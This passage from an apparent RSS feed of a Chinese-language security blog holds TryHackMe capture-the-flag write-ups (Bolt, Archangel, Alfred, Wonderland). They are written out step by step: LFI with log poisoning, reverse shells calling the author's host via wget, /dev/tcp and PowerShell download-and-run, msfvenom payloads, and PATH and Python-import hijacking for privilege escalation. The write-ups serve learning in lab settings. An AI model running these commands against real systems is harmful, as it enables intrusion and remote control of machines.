&lt;li&gt;但是也沒有用 ?__?改用 msf- &lt;code&gt;search bolt&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/75538-XTxmdaA.png"&gt;找到了第 0 個 RCE 的&lt;code&gt;use 0``set PASSWORD password``set USERNAME bolt``set RHOSTS 10.10.51.13``set LHOST tun0``show options&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d8822-zIX4Qdc.png"&gt;&lt;code&gt;exploit&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/66e66-hcny3lE.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3e5ba-Vdxp4Rd.png"&gt;成功 RCE 取得 flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6b0f2-z8huKEP.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Archangel (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/06/archangel-try-hack-me-writeup/</link><pubDate>Fri, 06 Aug 2021 23:48:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/06/archangel-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;url : &lt;a href="https://tryhackme.com/room/archangel"&gt;https://tryhackme.com/room/archangel&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.163.60&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式，掃 Port &lt;code&gt;rustscan -a 10.10.163.60&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4fbae-DkyiPwB.png"&gt;&lt;/li&gt;
&lt;li&gt;80 , 22掃路徑 &lt;code&gt;python3 dirsearch.py -u http://10.10.163.60/ -e all&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/21bd5-VzsbcR0.png"&gt;觀察網頁首頁，發現裡面有 &lt;code&gt;/flag&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c6590-ZEE1LMm.png"&gt;&lt;/li&gt;
&lt;li&gt;點進去後 ……&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2c29c-xjq9ave.png"&gt;&lt;/li&gt;
&lt;li&gt;幹…&lt;/li&gt;
&lt;li&gt;用 curl 觀察&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cf4f4-t50dIAx.png"&gt;&lt;/li&gt;
&lt;li&gt;他會自動跳轉到這邊 &lt;a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ"&gt;https://www.youtube.com/watch?v=dQw4w9WgXcQ&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="dfferent-hostname"&gt;Dfferent Hostname&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;題目提示 : &lt;code&gt;Find a different hostname&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d2734-qUlq0LJ.png"&gt;&lt;/li&gt;
&lt;li&gt;可以觀察 &lt;code&gt;mafialive.thm``sudo vim /etc/hosts&lt;/code&gt;- 加上這一行 &lt;code&gt;10.10.163.60 mafialive.thm&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;接下來到 &lt;a href="http://mafialive.thm/"&gt;http://mafialive.thm/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e051f-KYuqXWR.png"&gt;&lt;/li&gt;
&lt;li&gt;就拿到了 flag再掃一次路徑&lt;code&gt;python3 dirsearch.py -u http://mafialive.thm/ -e all&lt;/code&gt;- &lt;code&gt;http://mafialive.thm/robots.txt&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9e2fc-sAPv2Gu.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/test.php&lt;/code&gt;&lt;a href="http://mafialive.thm/test.php"&gt;http://mafialive.thm/test.php&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a2a18-N9Ec4bZ.png"&gt;觀察按下按鈕後的網址- &lt;a href="http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php"&gt;http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d7688-XPlzuRQ.png"&gt;&lt;/li&gt;
&lt;li&gt;感覺很明顯可以 LFI嘗試 Base64 Payloadhttp://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php&lt;/li&gt;
&lt;li&gt;成功 !!&lt;/li&gt;
&lt;li&gt;觀察 test.php 原始碼http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-php" data-lang="php"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;INCLUDE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Test Page&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;Not&lt;/span&gt; to be Deployed
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Here is a button
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;又撿到一個 flag &lt;code&gt;thm{explo1t1ng_lf1}&lt;/code&gt;觀察原始碼發現，網址裡不能出現 &lt;code&gt;../..&lt;/code&gt; 且一定要出現 &lt;code&gt;/var/www/html/development_testing``../..&lt;/code&gt; 可以用 &lt;code&gt;.././..&lt;/code&gt; 繞測試 &lt;code&gt;curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././etc/passwd&lt;/code&gt;成功!!&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/79e51-zGil911.png"&gt;來看 apache access log- &lt;code&gt;/var/log/apache2/access.log&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;成功 !!&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3c0a2-WYHb6LH.png"&gt;&lt;/li&gt;
&lt;li&gt;往上拉發現所有的 host log 都在這邊，所以可以直接針對 ip 來做 nc 寫 php&lt;code&gt;nc 10.10.163.60 80&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GET /?&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3f636-MiuNtLX.png"&gt;再回去看一次 access log- &lt;a href="http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log"&gt;http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;成功出現 phpinfo !!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d5a57-XqQ4scJ.png"&gt;寫入 webshell- &lt;code&gt;nc 10.10.163.60 80&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GET /&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7eb4e-wGnyObt.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&amp;amp;A=ls!%5B%5D(/uploads/2022/02/ea69f-JHfk4lv.png)"&gt;http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&amp;amp;A=ls![](/uploads/2022/02/ea69f-JHfk4lv.png)&lt;/a&gt;下載 reverse shell- &lt;code&gt;http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&amp;amp;B=wget 10.13.21.55:8000/s -O /tmp/s&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1b396-GDeKuQ2.png"&gt;&lt;/li&gt;
&lt;li&gt;本地準備監聽 &lt;code&gt;nc -vlk 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;執行 shell &lt;code&gt;http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&amp;amp;B=bash%20/tmp/s&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;成功接上&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/910b2-JkQjkHV.png"&gt;使用 python 讓 terminal 變漂亮- &lt;code&gt;python3 -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;找 user flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ee60c-voiBmAr.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;thm{lf1_t0_rc3_1s_tr1cky}&lt;/code&gt;找到使用者資料夾內有 passwordbackup- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5c0be-LKIcTu2.png"&gt;&lt;/li&gt;
&lt;li&gt;幹…再一次&lt;/li&gt;
&lt;li&gt;等……等等，不會吧&lt;/li&gt;
&lt;li&gt;該不會那個網址真 TM 是他的密碼 ?__?&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ba65b-rngMQwS.png"&gt;好的，好險不是使用 Linpeas 掃- &lt;code&gt;wget 10.13.21.55:8000/linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bash linpeas.sh&lt;/code&gt;找到一個可疑的 cron job&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e3381-9QYLgx9.png"&gt;發現 這個 cron 會使用 &lt;code&gt;archangel&lt;/code&gt; 來執行，而且我們對 &lt;code&gt;/opt/helloworld.sh&lt;/code&gt;有讀寫權限&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/73180-YYauluN.png"&gt;寫入 reverse shell&lt;code&gt;echo &amp;quot;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7878 0&amp;gt;&amp;amp;1'&amp;quot; &amp;gt;&amp;gt; /opt/helloworld.sh&lt;/code&gt;等待一分鐘後，自動接上!!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f17f3-ZQ4fZmN.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/72118-D3bK7Rc.png"&gt;&lt;/li&gt;
&lt;li&gt;找到 flag&lt;code&gt;thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}&lt;/code&gt;觀察使用者中的 secret 資料夾中- 有一個 backup 檔案有 suid&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/78721-omAJJqD.png"&gt;透過 nc 把檔案傳出來- 監聽端 &lt;code&gt;nc -l -p 1234 &amp;gt; meow&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發送端 &lt;code&gt;nc 10.13.21.55 1234 哼!這種等級的 reverse，連 ida 都不用開，我們用 r2 就好ㄌ- &lt;/code&gt;r2 meow`&lt;/li&gt;
&lt;li&gt;&lt;code&gt;aaa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;s main&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VV&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2bc2a-P6euu23.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看到他會用 system call 一個 cp&lt;/li&gt;
&lt;li&gt;而 cp 沒有寫絕對路徑，所以可以用 path 進行誤導&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="誤導-path"&gt;誤導 path&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;在家目錄創一個 fakepath&lt;code&gt;mkdir fakepath&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;export PATH=/home/archangel/fakepath:$PATH&lt;/code&gt;準備一個假的 cp 檔案- &lt;code&gt;echo '#!/bin/bash' &amp;gt; cp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;echo &amp;quot;/bin/bash&amp;quot; &amp;gt;&amp;gt; cp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;chmod +x cp&lt;/code&gt;執行 backup- &lt;code&gt;./backup&lt;/code&gt;取得 root 權限 !!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cac95-h6rVFzI.png"&gt;&lt;code&gt;thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Alfred (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/06/alfred-try-hack-me-writeup/</link><pubDate>Fri, 06 Aug 2021 23:45:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/06/alfred-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/alfred"&gt;https://tryhackme.com/room/alfred&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.244.238&lt;/p&gt;
&lt;h2 id="initial-access"&gt;Initial access&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;rustscan -a 10.10.244.238&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8a449-mbVfrX4.png"&gt;&lt;/li&gt;
&lt;li&gt;80&lt;/li&gt;
&lt;li&gt;3389&lt;/li&gt;
&lt;li&gt;8080&lt;code&gt;nmap -A -p80,3389,8080 10.10.244.238&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2f617-O4ife5c.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 8080 的 Jenkins 是Jetty 9.4.z-SNAPSHOT&lt;/li&gt;
&lt;li&gt;但找不到相關的 Exploit80 port 首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/72c5a-FiQgTSO.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來沒什麼特別的東西QQ&lt;/li&gt;
&lt;li&gt;&lt;code&gt;python3 dirsearch.py -u http://10.10.244.238/&lt;/code&gt;掃了之後也沒啥東西8080 port 登入頁面- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/88eec-ZpPK5aV.png"&gt;&lt;/li&gt;
&lt;li&gt;發現會掃出一些404，但沒啥幫助&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/55d89-GHAKXIx.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="進入-jenkins"&gt;進入 Jenkins&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;看到官方的 hint 寫 &lt;code&gt;*****:*****&lt;/code&gt;直接通靈猜 &lt;code&gt;admin:admin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;就進去了 ……&lt;/li&gt;
&lt;li&gt;好無聊= =透過 Deploy 的 build code 輸入指令- &lt;code&gt;whoami&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c2ccc-c0NEr3A.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;systeminfo&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9b71f-auOcIUd.png"&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8f0fa-TCQzzJs.png"&gt;準備 Windows Reverse Shell- 本機&lt;code&gt;wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;nc -nvlp 7877&lt;/code&gt;靶機- &lt;code&gt;powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.21.55:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.21.55 -Port 7877&lt;/code&gt;就成功接上了- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a26cd-UwVAt2v.png"&gt;取得 uesr flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/92321-4luITJB.png"&gt;使用 msfvenom 產 meterperter reverse shell- &lt;code&gt;msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.21.55 LPORT=7879 -f exe -o meow.exe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6b1fc-aYt7UNF.png"&gt;開啟 &lt;code&gt;msfconsole&lt;/code&gt; 準備接收- &lt;code&gt;use exploit/multi/handler&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;set LHOST 10.13.21.55&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;set LPORT 7879&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;set PAYLOAD windows/meterpreter/reverse_tcp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;show options&lt;/code&gt; 確認參數是否正確&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3ca44-l9tJQ4T.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;run&lt;/code&gt; 等待接收下載並執行 meterpreter 的 shell- &lt;code&gt;powershell &amp;quot;(New-Object System.Net.WebClient).Downloadfile('http://10.13.21.55:8000/meow.exe','meow.exe')&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Start-Process &amp;quot;meow.exe&amp;quot;&lt;/code&gt;msf 接上了!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ca882-OdnUd28.png"&gt;What is the final size of the exe payload that you generated?- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c9186-94o2f0D.png"&gt;&lt;/li&gt;
&lt;li&gt;73802meterperter- &lt;code&gt;getuid&lt;/code&gt;回傳 &lt;code&gt;Alfred\bruce``load incognito``list_tokens -g&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5afbc-mhZvk5Z.png"&gt;&lt;/li&gt;
&lt;li&gt;發現可以利用 &lt;code&gt;BUILTIN\Administrators``impersonate_token &amp;quot;BUILTIN\Administrators&amp;quot;&lt;/code&gt;- 成功!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6d7ac-dPzyJX4.png"&gt;&lt;/li&gt;
&lt;li&gt;再次 &lt;code&gt;whoami&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/93f9a-kwC11C5.png"&gt;Migrate 到 system- &lt;code&gt;ps&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/95c21-YGSMxtS.png"&gt;&lt;/li&gt;
&lt;li&gt;準備寄生到 &lt;code&gt;services.exe``migrate 668&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b761d-yiPSvrR.png"&gt;&lt;/li&gt;
&lt;li&gt;成功!輸入 &lt;code&gt;shell&lt;/code&gt;- &lt;code&gt;cd system&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;type root.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;取得 root flag&lt;code&gt;dff0f748678f280250f25a45b8046b4a&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Wonderland (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/05/wonderland-try-hack-me-writeup/</link><pubDate>Thu, 05 Aug 2021 13:30:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/05/wonderland-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL: &lt;a href="https://tryhackme.com/dashboard"&gt;https://tryhackme.com/dashboard&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.166.15&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;一直 nmap 太老梗太無聊了來玩玩新東西 &lt;code&gt;RustScan&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sudo dpkg -i rustscan_2.0.1_amd64.deb``rustscan -a 10.10.166.15&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ac630-Gnkagw5.png"&gt;&lt;/li&gt;
&lt;li&gt;開 22 跟 80&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="網址"&gt;網址&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;http://10.10.166.15/透過 dirsearch 可以找到&lt;code&gt;/r&lt;/code&gt;http://10.10.166.15/r/ 再掃，可以掃到- &lt;code&gt;/a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/63a8a-ynk4AVX.png"&gt;感覺每次都是一個字，所以可以爆搜看看，自己寫一個 python 腳本- &lt;code&gt;import requests from multiprocessing import Pool url = 'http://10.10.166.15/r/a/' alphabat = 'abcdefghijklmnopqrstuvwxyz' def req(i): res = requests.get(f'{url}/{i}') if res.status_code == 200: print(i) p = Pool(10) p.map(req,alphabat)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;如果爆到正確的就會 print 出來，然後手動把搜的結果加去 url 最後面再爆所以最後爆出的結果是&lt;code&gt;r/a/b/b/i/t&lt;/code&gt;http://10.10.166.15/r/a/b/b/i/t/- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ce654-dZNYcX2.png"&gt;&lt;/li&gt;
&lt;li&gt;觀察原始碼會發現一串奇怪的字串&lt;code&gt;alice:HowDothTheLittleCrocodileImproveHisShiningTail&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;斷詞後發現是 &lt;code&gt;How Doth The Little Crocodile Improve His Shining Tail&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;來自於How Doth the Little Crocodile&lt;/li&gt;
&lt;li&gt;路易斯·卡羅創作的詩&lt;code&gt;How doth the little crocodile Improve his shining tail And pour the waters of the Nile On every golden scale! How cheerfully he seems to grin How neatly spreads his claws, And welcomes little fishes in With gently smiling jaws!&lt;/code&gt;好…完全不重要&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssh"&gt;SSH&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;通靈一下，我們時常會把帳號跟密碼用 &lt;code&gt;:&lt;/code&gt; 隔開說不定，上面那串就是 alice 的密碼！嘗試ssh登入看看&lt;code&gt;ssh alice@10.10.166.15&lt;/code&gt;密碼 &lt;code&gt;HowDothTheLittleCrocodileImproveHisShiningTail&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2e2f4-gjqdOYu.png"&gt;到處找了一輪，都找不到 &lt;code&gt;user.txt&lt;/code&gt; QAQ- 算了，我們直接想辦法提權，等有 root 後再用上帝視角來搜!&lt;/li&gt;
&lt;li&gt;但反而我們使用者&lt;code&gt;alice&lt;/code&gt;的家目錄有一個沒有權限讀的 &lt;code&gt;root.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/88210-oOd2vhi.png"&gt;輸入 &lt;code&gt;sudo -l&lt;/code&gt; 觀察- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/36e45-BjLRyHY.png"&gt;&lt;/li&gt;
&lt;li&gt;發現我們可以用 &lt;code&gt;rabbit&lt;/code&gt; 使用者身分執行 &lt;code&gt;/usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;所以執行方法應該如下 &lt;code&gt;sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="挾持-python"&gt;挾持 Python&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;觀察 &lt;code&gt;walrus_and_the_carpenter.py&lt;/code&gt;發現內部的程式碼會 &lt;code&gt;import random&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;這個時候我們可以透過一些小技巧挾持他的 &lt;code&gt;random&lt;/code&gt;Python 的 import 有一個特性- 首先他會讀取同一個資料夾裡面，是否有相同檔名的檔案來給他 Import&lt;/li&gt;
&lt;li&gt;再來才會去找 &lt;code&gt;sys.path&lt;/code&gt; 裡面的東西可以輸入 &lt;code&gt;python3 -c &amp;quot;import sys; print(sys.path)&amp;quot;&lt;/code&gt; 觀察所以由於該檔案在我們家目錄，我們可以在自己家目錄下創一個 &lt;code&gt;random.py&lt;/code&gt;- 此時如果執行該 python 檔案，即可使用我們自己的 random&lt;/li&gt;
&lt;li&gt;我們建造的 &lt;code&gt;random.py``python3 import pty pty.spawn(&amp;quot;/bin/bash&amp;quot;)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;以 &lt;code&gt;rabbit&lt;/code&gt; 使用者執行看看&lt;code&gt;sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;就會發現我們噴成 rabbit 的 shell 了!&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d47f3-Oo40rbI.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="逆向工程"&gt;逆向工程&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;進入 rabbit 後，發現他的家目錄有一個 &lt;code&gt;teaParty&lt;/code&gt; 的檔案透過 &lt;code&gt;file teaParty&lt;/code&gt; 檢查會發現他是一個 ELF 執行檔&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ec2d6-9qL5oDi.png"&gt;透過 &lt;code&gt;ls -al teaParty&lt;/code&gt; 會發現他有 SUID- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bd021-SYqw5mF.png"&gt;那不管了，我們先執行看看ㄅ!- &lt;code&gt;./teaParty&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b7218-Zc4fGaO.png"&gt;&lt;/li&gt;
&lt;li&gt;噴了一些字，還有當前時間就卡住了，感覺可以讓我輸入一些字，那就先隨便輸入個 &lt;code&gt;meow&lt;/code&gt; 看看ㄅ&lt;/li&gt;
&lt;li&gt;哇…… 噴出了 &lt;code&gt;Segmentation fault (core dumped)&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/99d8e-Eni6IZo.png"&gt;&lt;/li&gt;
&lt;li&gt;母…母湯阿，不會在這邊要開始打 &lt;code&gt;pwn&lt;/code&gt; 了吧 QWQ好吧，那我們先把檔案抓出來分析看看- &lt;code&gt;cp teaParty /tmp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;chmod 777 /tmp/teaParty&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;本機&lt;code&gt;scp alice@10.10.166.15:/tmp/teaParty .&lt;/code&gt;透過 Cutter 打開- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/405e6-5QJYvOD.png"&gt;&lt;/li&gt;
&lt;li&gt;觀察 &lt;code&gt;main&lt;/code&gt; 函數會發現，先會 set &lt;code&gt;uid&lt;/code&gt; 跟 &lt;code&gt;gid&lt;/code&gt; 為 0x3eb = 1003&lt;/li&gt;
&lt;li&gt;先觀察一下 uid、gid 1003 是誰&lt;code&gt;cat /etc/passwd | grep 1003&lt;/code&gt;&lt;/li&gt;
